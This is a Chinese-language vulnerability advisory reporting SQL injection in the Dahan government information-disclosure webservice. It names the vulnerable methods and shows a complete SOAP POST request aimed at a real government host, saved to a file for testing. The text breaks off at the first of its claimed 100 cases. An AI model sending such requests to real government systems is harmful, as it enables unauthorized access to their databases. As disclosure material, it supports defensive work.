大汉政府信息公开多处SQL注入二(附100个案例)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 大汉政府信息公开多处SQL注入二(附100个案例) ### 详细说明: 依然webservice漏洞 ``` /xxgk/services/WSYsqgk?wsdl ``` 该WSYsqgk服务的多个方法,多个参数存在严重漏洞,且该漏洞普遍存在,如 wsTest getClientIpAxis wsGetYsqgk 上述方法的多个参数均存在漏洞,这里随便选取一个方法进行测试 首先保存如下内容为wooyun.txt ``` POST /xxgk/services/WSYsqgk?wsdl HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" Content-Length: 222 Host: xxgk.yiyuan.gov.cn Connection: Close User-Agent: google robots <soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:rec="http://receive.blf.jcms"> <soapenv:Header/> <soapenv:Body> <rec:wsGetYsqgk soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <strId xsi:type="xsd:string">1</strId> <strLoginId xsi:type="xsd:string">2</strLoginId> <strPwd xsi:type="xsd:string">3</strPwd> <strKey xsi:type="xsd:string">4</strKey> </rec:wsGetYsqgk> </soapenv:Body> </soapenv:Envelope> ``` 案例一:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息